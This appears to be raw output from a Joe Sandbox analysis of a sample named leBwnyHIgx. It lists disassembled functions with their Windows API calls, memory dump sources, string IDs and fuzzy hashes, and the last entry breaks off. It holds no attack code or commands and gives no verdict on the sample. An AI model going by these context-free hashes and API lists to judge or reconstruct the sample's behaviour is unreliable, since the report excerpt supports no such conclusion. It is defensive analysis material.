                                                                                    Function 0042CB08 Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0042CBBD
                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0042CBD9
                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0042CC12
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0042CC8F
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0042CCA8
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0042CCE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                    • String ID:
                                                                                    • API String ID: 351091851-0
                                                                                    • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                    • Instruction ID: b9c2064567b20e793381e804e5bc2438c092fd9c167849d7407d8daf0e01c371
                                                                                    • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                    • Instruction Fuzzy Hash: 1951CA75A006299BCB22DB99D9C1BDDB3FCAF4C304F8041DAE509E7211D634AF858F69
                                                                                    Function 10012000 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001200D
                                                                                    • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001201E
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012029
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10012053
                                                                                    • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10012083
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 4206206407-0
                                                                                    • Opcode ID: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
                                                                                    • Instruction ID: ed5e708f9a507b4adfd911d3508ec20c212b5a391fedcf247e80062d61f76bb5
                                                                                    • Opcode Fuzzy Hash: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
                                                                                    • Instruction Fuzzy Hash: C531C5F9E00108BBDB04EFA4D89599D7BB6EF54244F008069F9069F242EB31EAD5CB95
                                                                                    Function 10004EE0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004EF7
                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 10004F34
                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004F51
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10004F69
                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 10004F97
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 10004FB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$memset
                                                                                    • String ID:
                                                                                    • API String ID: 1216362210-0
                                                                                    • Opcode ID: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
                                                                                    • Instruction ID: b6c0c3fe9f7a8ecbfd6a68903a988b9ee954c4047185b56f79f4f3260df6d144
                                                                                    • Opcode Fuzzy Hash: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
                                                                                    • Instruction Fuzzy Hash: 71312FB5E40208BFEB14DBD8CC86FAEB7B5EB48710F204254F615AB2C0D671AB408B55
                                                                                    Function 00646274 Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00646290
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0064F22D,00000000,0064FB5F), ref: 006462BF
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006462D4
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006462FB
                                                                                    • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00646314
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00646335
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Show
                                                                                    • String ID:
                                                                                    • API String ID: 3609083571-0
                                                                                    • Opcode ID: 56e9fd127e5b8df3264884d8cb962e5cf8db3fc3bd665bacd5c80e76b0042ab2
                                                                                    • Instruction ID: 4dd900cc12852a0d25872cc702cb4c4dd59defd6bf464013fc66fcb0f6f5a345
                                                                                    • Opcode Fuzzy Hash: 56e9fd127e5b8df3264884d8cb962e5cf8db3fc3bd665bacd5c80e76b0042ab2
                                                                                    • Instruction Fuzzy Hash: F0112E35344701BFCB00DB68DD91FD237E9AB1A355F0452A5F645DB3B2CAB8E8809B44
                                                                                    Function 00404850 Relevance: 9.1, APIs: 6, Instructions: 51fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00404872
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 00404878
                                                                                    • GetStdHandle.KERNEL32(000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00404897
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0040489D
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 004048B4
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 004048BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3320372497-0
                                                                                    • Opcode ID: 4a542bbfe69cf2b8d6e1af26e7d435816e64742c81cc072ed4eb12002cc2b380
                                                                                    • Instruction ID: 9db4a11d59ebcb307a3cfeeab30a2223b0d8a9ead0fdef3697f8df52dc81456b
                                                                                    • Opcode Fuzzy Hash: 4a542bbfe69cf2b8d6e1af26e7d435816e64742c81cc072ed4eb12002cc2b380
                                                                                    • Instruction Fuzzy Hash: 3C01A9E26053103EF610FB6A9D86F5B2ADC8B4576AF10463B7218F31D2C9389D44937E
                                                                                    Function 00403F88 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257), ref: 0040403F
                                                                                    • Sleep.KERNEL32(0000000A,00000000,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD,00000000,00000220,0042715C,?,004271AA), ref: 00404055
                                                                                    • Sleep.KERNEL32(00000000,?,-00000004,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD,00000000,00000220,0042715C), ref: 00404083
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,-00000004,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD,00000000,00000220,0042715C), ref: 00404099
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: aa65c037b8b16099025df41b79eb0bd70fabd568e44aaae4c7f43dd737f2b1a1
                                                                                    • Instruction ID: f1ec43ae1c30d41b10cc41b48195bce38923192b9b407a0b5587fa379d4d1d3c
                                                                                    • Opcode Fuzzy Hash: aa65c037b8b16099025df41b79eb0bd70fabd568e44aaae4c7f43dd737f2b1a1
                                                                                    • Instruction Fuzzy Hash: 1FC136B2A002618FC715CF69E884316BFE5ABC5311F0882BFE555AB3D1C3B8DA41DB94
                                                                                    Function 00CE5DC7 Relevance: 9.0, APIs: 6, Instructions: 41synchronizationthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 00CE5DE1
                                                                                    • GetLastError.KERNEL32 ref: 00CE5DEA
                                                                                    • CloseHandle.KERNEL32(?), ref: 00CE5DFB
                                                                                    • GetCurrentThread.KERNEL32 ref: 00CE5E13
                                                                                    • WaitForSingleObject.KERNEL32(00000000), ref: 00CE5E1A
                                                                                    • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 00CE5E2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 3416154964-0
                                                                                    • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction ID: 47696616b45df94fa155a4e1f942072f2906b2646584eae5d677752322e22ff4
                                                                                    • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction Fuzzy Hash: 6E014F30A94758FBF791ABF08C8EB5D3A64EB08702F108450F70AAA1D0DAB4DB448B25
                                                                                    Function 00600B6C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 239windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600BE9
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600C10
                                                                                    • SetForegroundWindow.USER32(?), ref: 00600C21
                                                                                    • DefWindowProcW.USER32(?,?,?,?,00000000,00600EE8,?,00000000,00600F26), ref: 00600ED3
                                                                                    Strings
                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00600D5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostWindow$ForegroundProc
                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                    • API String ID: 602442252-3182603685
                                                                                    • Opcode ID: 3fce2995ff52617cc64c320909660141712ed5c555b9955e6d286241251052a9
                                                                                    • Instruction ID: ab36fd57ef67da6a4d73ccec4cc41cbfff4955b2beb65bb6a2c22b7cd4e29d0d
                                                                                    • Opcode Fuzzy Hash: 3fce2995ff52617cc64c320909660141712ed5c555b9955e6d286241251052a9
                                                                                    • Instruction Fuzzy Hash: 65911134644204AFE719DF58CD61F9ABBBAEB89700F1584AAF804AB3E1C675AD40CF14
                                                                                    Function 00407BAA Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,00000000), ref: 00407C7E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$X7@$iB
                                                                                    • API String ID: 3192549508-2475287703
                                                                                    • Opcode ID: 6e439ee28c1b6b67f9ec44174080eca639c9944c0a14d27f714a052d0cab6a9f
                                                                                    • Instruction ID: 9b8732aad967581ee1cfddc98b064603106c7b26d23cb4f63de0fa6512a07937
                                                                                    • Opcode Fuzzy Hash: 6e439ee28c1b6b67f9ec44174080eca639c9944c0a14d27f714a052d0cab6a9f
                                                                                    • Instruction Fuzzy Hash: 3C417F71A0C2059FE720DF14D884B2BB7A5EF94314F15856AE549AB3D1C738FC82CB6A
                                                                                    Function 005F89FC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AE7
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle
                                                                                    • String ID: .tmp$_iu$jd
                                                                                    • API String ID: 3498533004-1802150322
                                                                                    • Opcode ID: a0223c2dfc578305c0dddc432aeb03b296bc242cc522b57ea9052b2c607b4f5e
                                                                                    • Instruction ID: 3061496996edbf0f295552ba256b7f5cd8ef57c15fc1c95d12c7dd96c3447177
                                                                                    • Opcode Fuzzy Hash: a0223c2dfc578305c0dddc432aeb03b296bc242cc522b57ea9052b2c607b4f5e
                                                                                    • Instruction Fuzzy Hash: 9C31A430A4021DABDB10EBA5C846BEEBBB4FF45314F10417AF640B72D2DA786E059758
                                                                                    Function 005A3AB4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 103timethreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005A3A28: GetCursorPos.USER32 ref: 005A3A2F
                                                                                    • SetTimer.USER32(00000000,00000000,00000000,00000000), ref: 005A3B9F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005A3BD9
                                                                                    • WaitMessage.USER32(00000000,005A3C1D,?,?,?,00000000), ref: 005A3BFD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentCursorMessageThreadTimerWait
                                                                                    • String ID: $/Z$D0f
                                                                                    • API String ID: 3909455694-26430867
                                                                                    • Opcode ID: d78b845be59367d3e209cbd22b0e30c63a83b27645a5c60fd08de3d69e42f648
                                                                                    • Instruction ID: e22e41007f1cd188d3129f5814c38c56834451e257cf5d477a750d23bbd2f832
                                                                                    • Opcode Fuzzy Hash: d78b845be59367d3e209cbd22b0e30c63a83b27645a5c60fd08de3d69e42f648
